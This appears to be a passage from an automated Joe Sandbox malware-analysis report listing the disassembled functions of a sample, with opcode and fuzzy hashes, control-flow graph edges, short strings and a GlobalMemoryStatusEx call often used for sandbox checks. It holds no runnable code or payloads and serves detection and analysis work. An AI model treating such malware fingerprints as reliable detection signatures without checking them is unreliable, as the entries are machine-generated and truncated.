                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ad46c8c95dadcb2ed398067a763c866dd72f82d6b8d4b51671f3c10b20fd2edf
                                  • Instruction ID: 7d618a349a2fabdc9f7a12f6e12d4864e07269b962a3df6c9e9ebf4c4ba54adb
                                  • Opcode Fuzzy Hash: ad46c8c95dadcb2ed398067a763c866dd72f82d6b8d4b51671f3c10b20fd2edf
                                  • Instruction Fuzzy Hash: F1914C78E00209DFDB90CFA9CD8579EBBF2AF88304F148129E519E7294EB749845CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02806EDA Relevance: 2.6, Strings: 2, Instructions: 149COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2336 2806eda-2806f42 call 2806c40 2345 2806f44-2806f5d call 2806384 2336->2345 2346 2806f5e-2806f8c 2336->2346 2350 2806f8e-2806f91 2346->2350 2352 2806f93-2806fc8 2350->2352 2353 2806fcd-2806fd0 2350->2353 2352->2353 2354 2806fd2-2806fd9 2353->2354 2355 2806fe4-2806fe7 2353->2355 2356 28070eb-28070f1 2354->2356 2357 2806fdf 2354->2357 2358 2806fe9-2806ffd 2355->2358 2359 280701a-280701d 2355->2359 2357->2355 2365 2807003 2358->2365 2366 2806fff-2807001 2358->2366 2360 280702d-280702f 2359->2360 2361 280701f 2359->2361 2363 2807031 2360->2363 2364 2807036-2807039 2360->2364 2379 280701f call 2807918 2361->2379 2380 280701f call 280790a 2361->2380 2363->2364 2364->2350 2368 280703f-280704e 2364->2368 2369 2807006-2807015 2365->2369 2366->2369 2367 2807025-2807028 2367->2360 2371 2807050-2807053 2368->2371 2372 2807078-280708e 2368->2372 2369->2359 2375 280705b-2807076 2371->2375 2372->2356 2375->2371 2375->2372 2379->2367 2380->2367
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LRjq$LRjq
                                  • API String ID: 0-348097489
                                  • Opcode ID: bba7bf172035186471a32bf4acd5f775aa0f52a7017340fa70f66c6543225184
                                  • Instruction ID: eead362c5061f2b5c2a48763209118e7687bdf42b23d2f01961d13aeac7a6129
                                  • Opcode Fuzzy Hash: bba7bf172035186471a32bf4acd5f775aa0f52a7017340fa70f66c6543225184
                                  • Instruction Fuzzy Hash: D351B334F002558FDB55CF78C9A4BAEB7B6EF85300F10856AE405EB2D1DB719846CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 05CCE198 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2992 5cce198-5cce1a3 2993 5cce1cd-5cce1ec call 5ccd354 2992->2993 2994 5cce1a5-5cce1cc call 5ccd348 2992->2994 3000 5cce1ee-5cce1f1 2993->3000 3001 5cce1f2-5cce251 2993->3001 3008 5cce257-5cce2e4 GlobalMemoryStatusEx 3001->3008 3009 5cce253-5cce256 3001->3009 3013 5cce2ed-5cce315 3008->3013 3014 5cce2e6-5cce2ec 3008->3014 3014->3013
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3242095202.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_5cc0000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 83fb3e26a34f6cad6ba8f6f6d60c3d94531c33481613bb2135e5d89ab7ab2a3e
                                  • Instruction ID: af2742bbd1e68768c47519c6a173991b228ab9c9667d49ccda7c885082259849
                                  • Opcode Fuzzy Hash: 83fb3e26a34f6cad6ba8f6f6d60c3d94531c33481613bb2135e5d89ab7ab2a3e
                                  • Instruction Fuzzy Hash: F2412372E043598FCB04CFA9D8446EEBFF5AF89210F1485AAD405A7241DB789945CBD0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 05CCD354 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 3017 5ccd354-5cce2e4 GlobalMemoryStatusEx 3020 5cce2ed-5cce315 3017->3020 3021 5cce2e6-5cce2ec 3017->3021 3021->3020
                                  APIs
                                  • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05CCE1EA), ref: 05CCE2D7
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3242095202.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_5cc0000_P020241901.jbxd
                                  Similarity
                                  • API ID: GlobalMemoryStatus
                                  • String ID:
                                  • API String ID: 1890195054-0
                                  • Opcode ID: a71ee67b1ada717ab24e0394f61bffff32f2adb9a68634d3d7d4d0dfb8cb1362
                                  • Instruction ID: 10093c199eddbea67f644d6a490faf54508da13c214cfbb3b2e03fa11cbbc41a
                                  • Opcode Fuzzy Hash: a71ee67b1ada717ab24e0394f61bffff32f2adb9a68634d3d7d4d0dfb8cb1362
                                  • Instruction Fuzzy Hash: 361103B1C006599BCB10DF9AD544BAEFBF8EF49310F10856AE918B7240D378A944CFE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0280F3C5 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PHjq
                                  • API String ID: 0-751881793
                                  • Opcode ID: f706946d8d33406b50db126925c06b1771e0f95bae765c5ceb682f762397c453
                                  • Instruction ID: bfb4ca9be8d2712d959880498c2a25321bc7c9a12b724cf8f98536717e21449c
                                  • Opcode Fuzzy Hash: f706946d8d33406b50db126925c06b1771e0f95bae765c5ceb682f762397c453
                                  • Instruction Fuzzy Hash: F2310138B002418FDB659B34D99476E3BA3EF89210F148978D806DB395EF39DC4ACB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0280F3D8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PHjq
                                  • API String ID: 0-751881793
                                  • Opcode ID: 0988db559eced18e2e2d0369807841485b73473a18b70b02c9f6d68f2f029a87
                                  • Instruction ID: c70c2ece8b5bdae829c81b92397eb1706679503c8c37984b5caffb48e32cdb80
                                  • Opcode Fuzzy Hash: 0988db559eced18e2e2d0369807841485b73473a18b70b02c9f6d68f2f029a87
                                  • Instruction Fuzzy Hash: 5D31E138B002058FDB659B34D99476E3BA7EF89200F248978D806DB395DF35DC46CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02806F78 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LRjq
                                  • API String ID: 0-665714880
                                  • Opcode ID: a4b984912bf0e1819da0393ae1517c3e0686a8152277aa4534fb73d8475ff844
                                  • Instruction ID: 5adf8fa2e203894824ff1bed1b0491b582158cb7a8e005ca7376f4fd81fe917b
                                  • Opcode Fuzzy Hash: a4b984912bf0e1819da0393ae1517c3e0686a8152277aa4534fb73d8475ff844
                                  • Instruction Fuzzy Hash: 4A317378E00219DFDB54CF64D994BAEF7B6FF85310F108629E406EB290EB71A946CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0280790A Relevance: .6, Instructions: 552COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d27ee6a563614b2c5dcbc2c740dd3952b221b28f9de2d0aabe3ace529640fda5
                                  • Instruction ID: 0550931bde409ecb1407b055a585093984d641b9876163918eeae11006883fe7
                                  • Opcode Fuzzy Hash: d27ee6a563614b2c5dcbc2c740dd3952b221b28f9de2d0aabe3ace529640fda5
                                  • Instruction Fuzzy Hash: 02122E34B002118FCB69AB38E99872D76A7EB89305B60493DE405CB355CF79EC5BCB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02807918 Relevance: .6, Instructions: 550COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 289109fab9e02389c3c77f0935e18353a17f3dc0c00a5c3c6d12701d6f3fb74f
                                  • Instruction ID: 503a35cd7436d853579ccbb8c4daaf798152cd1383c046f5dae0ddc2f54cbbac
                                  • Opcode Fuzzy Hash: 289109fab9e02389c3c77f0935e18353a17f3dc0c00a5c3c6d12701d6f3fb74f
                                  • Instruction Fuzzy Hash: A7122D34B002118FCB69AB38E89872D76A7EB89705B60493DE405CB355CF79EC5BCB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02804A8C Relevance: .3, Instructions: 260COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3ad2565edea47acc95039036a3e9c4286996fdddd52b9035988fdaebaf1b87af
                                  • Instruction ID: 96b505da648ce8c84a7f971d26a70b09ea00fdb0e6b5b727cf9fd6a302a81e7d
                                  • Opcode Fuzzy Hash: 3ad2565edea47acc95039036a3e9c4286996fdddd52b9035988fdaebaf1b87af
                                  • Instruction Fuzzy Hash: 5DB17C78E402098FDB50CFA8CD917DDBBF2AF88318F148129D919E7294EB749885CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02809364 Relevance: .2, Instructions: 237COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f9d9014c53742e9f85b415a19be1a4abf472dff580f45fa19c0252356d623ae2
                                  • Instruction ID: 16fc72acca9de675214771d994656ee36f83b1f2c5261df197f0169d359ee566
                                  • Opcode Fuzzy Hash: f9d9014c53742e9f85b415a19be1a4abf472dff580f45fa19c0252356d623ae2
                                  • Instruction Fuzzy Hash: F0916238A001058FCB54DFA4D994AADBBF2EF88714F248469E40AE73A6DB35DC42CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02803E76 Relevance: .2, Instructions: 235COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 019229a2f1fc2c119e5c8e2383fdfe614d45b12b802abe50e0db9ab06192c172
                                  • Instruction ID: c0f59e832e6d8f54d46ba401eae1453ebe42f20d2ec4a2ad95de0e6d31119a88
                                  • Opcode Fuzzy Hash: 019229a2f1fc2c119e5c8e2383fdfe614d45b12b802abe50e0db9ab06192c172
                                  • Instruction Fuzzy Hash: 23A13B78E00209DFDB90CFA9C9857DDBBF2AF88314F148129E519E7294EB749885CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02804810 Relevance: .2, Instructions: 180COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c740a3c3bd74bf72bbc500b87bf56bad7cc15e91d463b140437121e138d6f66c
                                  • Instruction ID: 8c126e3fc66850e9488da8ce564cfaddf3448526fa21160ab867f3d2898181ee
                                  • Opcode Fuzzy Hash: c740a3c3bd74bf72bbc500b87bf56bad7cc15e91d463b140437121e138d6f66c
                                  • Instruction Fuzzy Hash: 35718BB8E002498FDB50DFA9C98579EBBF2BF88314F148129E519E7294EB349841CF95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02804804 Relevance: .2, Instructions: 178COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 431d45fb5866505ab88ecfc95d4be8dfe55ebd292459f7b010a8af45821d8956
                                  • Instruction ID: 0a4637e2c7d7724887123e6875ddb2e2c381c30da08f977080b908d988073694
                                  • Opcode Fuzzy Hash: 431d45fb5866505ab88ecfc95d4be8dfe55ebd292459f7b010a8af45821d8956
                                  • Instruction Fuzzy Hash: E7716BB8E002498FDB50CFA9C9857DEBBF2BF88314F148129E519E7294EB749841CF95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02806CDE Relevance: .1, Instructions: 136COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 62a262cc4683724db4dc00010422f7758e3bcc5972e580c6dcc1dc1ccf2f7257
                                  • Instruction ID: 48b8bb4ad88c9bf876083ca0b652d2dbc7b9812c38925650748ff72ae345b570
                                  • Opcode Fuzzy Hash: 62a262cc4683724db4dc00010422f7758e3bcc5972e580c6dcc1dc1ccf2f7257
                                  • Instruction Fuzzy Hash: 9E512378E002288FDB54CFA9C899BDDBBB5BF48304F148119E819BB395E774A844CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02806CE8 Relevance: .1, Instructions: 132COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f2132a18a50d7e6aff6fce6e2c2e154678287ca809de5df02f7cf1386cdd5039
                                  • Instruction ID: 7dfc75d98c56e0088e3b46a5c1d1da34ac2aee2014c2e8e937b50b3871b376a0
                                  • Opcode Fuzzy Hash: f2132a18a50d7e6aff6fce6e2c2e154678287ca809de5df02f7cf1386cdd5039
                                  • Instruction Fuzzy Hash: 17510378D003288FDB54DFA9C889B9DBBB5BF48314F148119E819BB3A4E774A844CF95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0280112A Relevance: .1, Instructions: 121COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fb349edab02114c45ea38deb843142fb178ad60d4f7baa4f2340dc87905e8435
                                  • Instruction ID: e5c040baafcb8e6eebd02ea30a60d878bcde0aab3b9fcfe415f788ceb39f08c0
                                  • Opcode Fuzzy Hash: fb349edab02114c45ea38deb843142fb178ad60d4f7baa4f2340dc87905e8435
                                  • Instruction Fuzzy Hash: 6D51A8316952458FCB0EEF78F988B593B76FB52308304996AD1044B27EDE60795BCB41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 028096E0 Relevance: .1, Instructions: 121COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 11274725c59c050068fd22f43105568f721dcd1fe1e47d6b8af823c2470a3675
                                  • Instruction ID: 2cff232d43e4344062a2ce8f74066cfa9f063c76aed247fbccb0067cfedc29aa
                                  • Opcode Fuzzy Hash: 11274725c59c050068fd22f43105568f721dcd1fe1e47d6b8af823c2470a3675
                                  • Instruction Fuzzy Hash: 1441A33DF001058BDFA49EA8D9C077EB766E785A10F20482AD51AE73D5D735EC418785
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02801138 Relevance: .1, Instructions: 112COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 566bb2c9002bf452a6056786399a0c27ac9e24588a112203a63e8aa01a46329f
                                  • Instruction ID: b4623263208e6f56f88258e314150b2092e381993c914c1bc0b541ff540e7813
                                  • Opcode Fuzzy Hash: 566bb2c9002bf452a6056786399a0c27ac9e24588a112203a63e8aa01a46329f
                                  • Instruction Fuzzy Hash: C95196316912458FCB0AEF78F988B593B7AFB923087009969D1044B27EDA70795BCB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0280F289 Relevance: .1, Instructions: 96COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: edaaca19e23d38be57ef80371ebe048091cec168ca3a314c531c85debcf4cf3b
                                  • Instruction ID: 4b3cafc35161a2e5f925f68395075518ca975de40333b8c83464cee889b68527
                                  • Opcode Fuzzy Hash: edaaca19e23d38be57ef80371ebe048091cec168ca3a314c531c85debcf4cf3b
                                  • Instruction Fuzzy Hash: DB319439E006059BCB15CFA4D99469EB7B2FF89310F14C929E906E7794DF75AC42CB40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 028026DC Relevance: .1, Instructions: 93COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ba402ce7fadd765806bb0ae9cb18c1acad0cebcf9df29a8dcff1fed5bfb1cc6b
                                  • Instruction ID: 04f21a29e2db4d5bcd964b0790fcdc3e96470f0bfff25d121787c2c4242469f3
                                  • Opcode Fuzzy Hash: ba402ce7fadd765806bb0ae9cb18c1acad0cebcf9df29a8dcff1fed5bfb1cc6b
                                  • Instruction Fuzzy Hash: B741FEB8D003499FDB10DFA9C984ADEBFF5FF48314F148429E809AB254DB75A949CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0280F298 Relevance: .1, Instructions: 91COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d402d1e139978bcd1ff2dd8a745c997919eb74ceb06240e4a54f9ed460b4fd3f
                                  • Instruction ID: 2fe1a48b8052d8a598de7e4c015e0e3639d8a6138d57c711e6154aef792cf8c8
                                  • Opcode Fuzzy Hash: d402d1e139978bcd1ff2dd8a745c997919eb74ceb06240e4a54f9ed460b4fd3f
                                  • Instruction Fuzzy Hash: E1316138E006059BCB29CFA4D99469EB7B6FF89310F14C929E906E7794DF74AC42CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 028026E8 Relevance: .1, Instructions: 90COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f16c4107cca056eae87c525fbfdf8d371f3dea181cb3c55eeabf5d751e06e0ba
                                  • Instruction ID: edbf5e3a90bfc293eaeeefe69e06ef571ff158e4e3e516441e627024924a8b10
                                  • Opcode Fuzzy Hash: f16c4107cca056eae87c525fbfdf8d371f3dea181cb3c55eeabf5d751e06e0ba
                                  • Instruction Fuzzy Hash: 6D41EFB8D003489FDB14DFA9C984ADEBFB5FF48314F148029E809AB254DB75A945CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 028050A8 Relevance: .1, Instructions: 89COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 57edbc538e9fea0bea20cff0c2922eb3ea25bce1de8488855854917d9a85b719
                                  • Instruction ID: 53a43dce9890d0f6a4a2996980b3ed8b480857f837201f4c560702f46f0a6d48
                                  • Opcode Fuzzy Hash: 57edbc538e9fea0bea20cff0c2922eb3ea25bce1de8488855854917d9a85b719
                                  • Instruction Fuzzy Hash: 1431DB3C6003158FDB58EB78C9946AD77B6BF89344B500468D506EB3A4DB3ADC42CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02805098 Relevance: .1, Instructions: 88COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 40816814465917f83e6e879d267c75fa3a336c1ea6d2151dde66ee65e690a207
                                  • Instruction ID: 1293b50fd9f0da54007ffb7ac50da5e8f87e861e4b15edc9450ea36f22d45792
                                  • Opcode Fuzzy Hash: 40816814465917f83e6e879d267c75fa3a336c1ea6d2151dde66ee65e690a207
                                  • Instruction Fuzzy Hash: E3311B3CA00315CFDB55EB78C9946AD77B6FF88358B500468C506EB3A4DB3A9C42CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 028017C0 Relevance: .1, Instructions: 87COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 110930df2f8827ebcf0e74457f086e59e4738d5717f8718b61e18f3ec2b1e54d
                                  • Instruction ID: e6b62c9179a66bb36e3e9b388b1c3ee4af34b85cb2c6bf5aa214e357d6120027
                                  • Opcode Fuzzy Hash: 110930df2f8827ebcf0e74457f086e59e4738d5717f8718b61e18f3ec2b1e54d
                                  • Instruction Fuzzy Hash: BB31D539B402418FDF51AB78E88876E3BE5EB84324F14056AD509C73A9E734D842CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02809250 Relevance: .1, Instructions: 84COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cce7f00996d1a1d8033c5ca2477315b78aab9da9eb6dd3d0f100b03da23ebeca
                                  • Instruction ID: 800621d6f7c3d08cb056270dc9f386889d6d4bc8601bcb4018a2d63257f0b3dc
                                  • Opcode Fuzzy Hash: cce7f00996d1a1d8033c5ca2477315b78aab9da9eb6dd3d0f100b03da23ebeca
                                  • Instruction Fuzzy Hash: F0318039E002069BDB15CFA4D9907DEBBB2EF89704F548529E809EB395EB719842CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02809260 Relevance: .1, Instructions: 78COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eb6e27e624d6d420c36ca1801e62ec497fd2182c6523c6c7f3d8ed56e56d74d6
                                  • Instruction ID: 4f16f71314bc91cfe66a7e8a1f789dba2d4ac4b68a935cc2e27d21d8b138c8f8
                                  • Opcode Fuzzy Hash: eb6e27e624d6d420c36ca1801e62ec497fd2182c6523c6c7f3d8ed56e56d74d6
                                  • Instruction Fuzzy Hash: 8F21A538E0020A9BDB05CFA4D99079EF7B2FF89300F54C519E409EB395DB719842CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02809150 Relevance: .1, Instructions: 75COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 64c87bdd1b94aa2ac3bdaaf71e583fd485af85e67e6e881e2c8207629a9fce8c
                                  • Instruction ID: 97b8d3ac9d8ab45cf70d2630c25d156b528a41fd6204e8d639932c080f4dc06b
                                  • Opcode Fuzzy Hash: 64c87bdd1b94aa2ac3bdaaf71e583fd485af85e67e6e881e2c8207629a9fce8c
                                  • Instruction Fuzzy Hash: 2A219239F042169FCB19CFA4D9946DEB7B2AF89704F10852AE815FB391DB70AC46CB41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 028016A0 Relevance: .1, Instructions: 74COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
